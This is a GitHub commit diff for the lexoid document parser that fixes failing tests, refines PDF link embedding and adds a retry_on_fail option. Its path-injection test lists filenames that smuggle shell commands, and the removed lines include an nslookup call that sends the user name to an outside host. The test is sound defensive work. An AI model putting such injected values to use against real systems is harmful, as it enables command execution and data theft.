Skip to content

Commit bf1af58

Browse files
authored
Fix failing test cases
1 parent 304d0c8 commit bf1af58

4 files changed

Lines changed: 50 additions & 49 deletions

File tree

lexoid/api.py

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -70,6 +70,11 @@ def wrapper(*args, **kwargs):
7070
kwargs["parser_type"] = parser_type
7171
return func(**kwargs)
7272
except Exception as e:
73+
if kwargs.get("retry_on_fail", True) is False:
74+
logger.error(
75+
f"Parsing failed with error: {e}. No fallback parser available."
76+
)
77+
raise e
7378
parse_type = kwargs.get("parser_type")
7479
routed = kwargs.get("routed", False)
7580
if parse_type == ParserType.LLM_PARSE and routed:

lexoid/core/conversion_utils.py

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -18,6 +18,8 @@
1818
from PyQt5.QtWebEngineWidgets import QWebEngineView
1919
from PyQt5.QtWidgets import QApplication
2020

21+
from loguru import logger
22+
2123

2224
def convert_pdf_page_to_base64(
2325
pdf_document: pdfium.PdfDocument, page_number: int
@@ -110,6 +112,7 @@ def save_webpage_as_pdf(url: str, output_path: str) -> str:
110112
Returns:
111113
str: The path to the saved PDF file.
112114
"""
115+
os.environ["QT_QPA_PLATFORM"] = "offscreen"
113116
if not QApplication.instance():
114117
app = QApplication(sys.argv)
115118
else:
@@ -181,6 +184,7 @@ def convert_to_pdf(input_path: str, output_path: str) -> str:
181184
str: The path to the saved PDF file.
182185
"""
183186
if input_path.startswith(("http://", "https://")):
187+
logger.debug(f"Converting webpage {input_path} to PDF...")
184188
return save_webpage_as_pdf(input_path, output_path)
185189
file_type = mimetypes.guess_type(input_path)[0]
186190
if file_type.startswith("image/"):

lexoid/core/parse_type/static_parser.py

Lines changed: 31 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -35,6 +35,8 @@ def wrapper(*args, **kwargs):
3535
try:
3636
return func(*args, **kwargs)
3737
except Exception as e:
38+
if kwargs.get("retry_on_fail", True) is False:
39+
raise e
3840
framework = kwargs.get("framework", "pdfplumber")
3941
if framework != "pdfplumber":
4042
kwargs["framework"] = "pdfplumber"
@@ -192,36 +194,53 @@ def embed_links_in_text(page, text, links):
192194
str: The text with hyperlinks embedded inline.
193195
"""
194196
words = page.extract_words(x_tolerance=1)
195-
196197
words_with_positions = []
197198
cur_position = 0
198199
for word in words:
199200
try:
200-
word_pos = text[cur_position:].index(word["text"])
201+
word_pos = text[cur_position:].index(word["text"]) + cur_position
201202
except ValueError:
202203
continue
203204
words_with_positions.append(
204205
(word["text"], word["x0"], page.mediabox[-1] - word["top"], word_pos)
205206
)
206-
cur_position = cur_position + word_pos + len(word["text"])
207+
cur_position = word_pos + len(word["text"])
207208

209+
offset = 0
208210
for rect, uri in links:
209211
rect_left, rect_top, rect_right, rect_bottom = rect
210212
text_span = []
211-
start_pos = None
213+
start_pos = end_pos = None
212214

213215
for word, x0, word_top, word_pos in words_with_positions:
214-
if rect_left <= x0 <= rect_right and rect_top <= word_top <= rect_bottom:
216+
if (
217+
rect_left - 1 <= x0 <= rect_right + 1
218+
and rect_top - 1 <= word_top <= rect_bottom + 1
219+
):
215220
if not start_pos:
216-
start_pos = word_pos
221+
start_pos = word_pos + offset
222+
end_pos = word_pos + len(word) + offset
217223
text_span.append(word)
218224

225+
if start_pos is None:
226+
logger.warning(f"No matching words found for link: {uri}")
227+
continue
228+
229+
# Set start_pos to previous space.
230+
if start_pos > 0 and text[start_pos - 1] != " ":
231+
start_pos = start_pos - len(text[:start_pos].split(" ")[-1])
232+
if end_pos < len(text) and text[end_pos : end_pos + 1] != " ":
233+
end_pos = end_pos + len(text[end_pos:].split(" ")[0])
219234
if text_span:
220-
original_text = " ".join(text_span)
221-
text = text[:start_pos] + text[start_pos:].replace(
222-
original_text, f"[{original_text}]({uri})"
235+
text = (
236+
text[:start_pos]
237+
+ f"[{text[start_pos:end_pos]}]({uri})"
238+
+ text[end_pos:]
223239
)
224-
240+
offset += len(uri) + 4 # Adjust offset for added link syntax
241+
else:
242+
logger.warning(f"No matching text found for link: {uri}")
243+
logger.debug(f"Embedded {len(links)} links into text: {text}.")
225244
return text
226245

227246

@@ -638,6 +657,8 @@ def detect_heading_level(font_size, body_font_size):
638657
if uri and uri_rects.get(uri):
639658
links.append((uri_rects[uri], uri))
640659

660+
logger.debug(f"Found {len(links)} links on page.")
661+
641662
if links:
642663
content = embed_links_in_text(page, content, links)
643664

tests/test_parser.py

Lines changed: 10 additions & 39 deletions
Original file line numberDiff line numberDiff line change
@@ -15,20 +15,11 @@
1515
os.makedirs(output_dir, exist_ok=True)
1616
models = [
1717
# Google models
18-
"gemini-2.0-pro-exp",
1918
"gemini-2.0-flash",
20-
"gemini-1.5-flash",
21-
"gemini-1.5-flash-8b",
22-
"gemini-1.5-pro",
19+
"gemini-2.0-pro",
2320
# OpenAI models
2421
"gpt-4o",
2522
"gpt-4o-mini",
26-
# Meta-LLAMA models through HF Hub
27-
"meta-llama/Llama-3.2-11B-Vision-Instruct",
28-
# Meta-LLAMA models through Together AI
29-
"meta-llama/Llama-3.2-11B-Vision-Instruct-Turbo",
30-
"meta-llama/Llama-3.2-90B-Vision-Instruct-Turbo",
31-
"meta-llama/Llama-Vision-Free",
3223
]
3324

3425

@@ -107,12 +98,11 @@ async def test_url_detection_pdfplumber(sample):
10798
assert any(found)
10899

109100

110-
@pytest.mark.parametrize("model", models)
111101
@pytest.mark.asyncio
112-
async def test_url_detection_multi_page_auto_routing(model):
102+
async def test_url_detection_multi_page_auto_routing():
113103
sample = "examples/inputs/sample_test_doc.pdf"
114104
patterns = ["http", "https", "www"]
115-
config = {"parser_type": "AUTO", "model": model, "verbose": True}
105+
config = {"parser_type": "AUTO", "verbose": True}
116106
results = parse(sample, pages_per_split=1, **config)["segments"]
117107

118108
assert len(results) == 6
@@ -147,10 +137,12 @@ async def test_url_detection_multi_page_auto_routing(model):
147137
@pytest.mark.asyncio
148138
@pytest.mark.parametrize("depth", [1, 2])
149139
async def test_recursive_url_parsing(depth):
150-
results = parse("https://example.com/", depth=depth)["segments"]
140+
results = parse("https://example.com/", depth=depth)
151141

142+
n_total_segments = len(results["segments"]) + len(results["recursive_docs"])
143+
# Each depth level adds one more document to be parsed.
152144
# Not necessarily always the case. Just the case for "example.com".
153-
assert len(results) == depth
145+
assert n_total_segments == depth, str(results)
154146

155147

156148
@pytest.mark.asyncio
@@ -276,19 +268,7 @@ async def test_large_pdf_parsing(sample):
276268
assert results[0]["content"] is not None
277269

278270

279-
token_usage_models = [
280-
# Google models
281-
"gemini-2.0-flash-001",
282-
# OpenAI models
283-
"gpt-4o",
284-
# Meta-LLAMA models through HF Hub
285-
"meta-llama/Llama-3.2-11B-Vision-Instruct",
286-
# Meta-LLAMA models through Together AI
287-
"meta-llama/Llama-3.2-11B-Vision-Instruct-Turbo",
288-
]
289-
290-
291-
@pytest.mark.parametrize("model", token_usage_models)
271+
@pytest.mark.parametrize("model", models)
292272
@pytest.mark.asyncio
293273
async def test_token_usage_api(model):
294274
sample = "examples/inputs/test_1.pdf"
@@ -340,14 +320,7 @@ async def test_page_nums():
340320
assert "acp@dca.ca.gov" not in result["raw"]
341321

342322

343-
@pytest.mark.parametrize(
344-
"model",
345-
[
346-
"gemini-2.0-flash",
347-
"gpt-4o",
348-
"meta-llama/Llama-3.2-11B-Vision-Instruct-Turbo",
349-
],
350-
)
323+
@pytest.mark.parametrize("model", models)
351324
@pytest.mark.asyncio
352325
async def test_token_cost(model):
353326
sample = "examples/inputs/test_1.pdf"
@@ -425,8 +398,6 @@ async def test_strikethrough_words():
425398
"test; mkdir -p path_injection_success.docx",
426399
"test|mkdir -p path_injection_success.docx",
427400
"test&&mkdir -p path_injection_success.docx",
428-
"test`nslookup $(whoami).zgj16g1o2dmxv2y6wwmegjxaq1wskt8i.net-spi.com`.docx",
429-
"ifconfig -a; echo 'test'.docx",
430401
],
431402
)
432403
@pytest.mark.asyncio
@@ -435,7 +406,7 @@ async def test_docx_path_injection(sample):
435406
parser_type = "STATIC_PARSE"
436407
dir_name = "path_injection_success"
437408
try:
438-
parse(sample, parser_type)["raw"]
409+
parse(sample, parser_type, retry_on_fail=False)["raw"]
439410
except Exception as e:
440411
print(f"Parsing failed: {e}")
441412
assert "Package not found" in str(e)

0 commit comments

Comments
 (0)